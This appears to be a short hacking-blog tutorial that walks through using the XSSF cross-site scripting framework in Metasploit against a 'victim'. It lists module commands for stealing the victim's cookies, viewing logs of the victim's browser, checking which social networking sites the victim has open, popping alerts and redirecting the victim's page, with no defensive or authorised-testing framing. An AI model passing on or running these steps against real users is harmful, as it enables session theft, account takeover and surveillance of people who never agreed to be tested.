First install XSSF
in metasploit, please refer the following
link “http://www.hackingarticles.in/xssf-cross-site-scripting-framework-in-metasploit/
”
Now use the following command In metasploit to capture
victim’s cookies
“use auxiliary/xssf/public/misc/cookie
Once
you get msf auxiliary prompt run the following command
“xssf_logs 1”
Now run the command “xssf_log 2” to store the logs where
2 is the Session ID
Now run “xssf_urls” command
to get all xssf URL commands
Now run “http://localhost:8889/gui.html?guipage=main” to see the
logs of victim’s PC.
You can see the logs in the last section as shown in the following
image.
If you wish to warn the victim run “use auxiliary/xssf/public/misc/alert” command
The following is the Alert message
on Victim’s Screen
You can see the logs in the last section as shown in the following
image.
Now refresh your log browser and see the series of logs as shown in the
following image.
Now run “use auxiliary/xssf/public/misc/check_connected” to check if victim
has opened any Social networking sites (eg . gmail, facebook , twitter)
Refresh the log
browser and see the logs getting updated as shown in below image.
Finally run “use auxiliary/xssf/public/misc/redirect
to redirect the victim’s page”
Refresh the log
browser and see the logs getting updated as shown in below image.
0 comments:
Post a Comment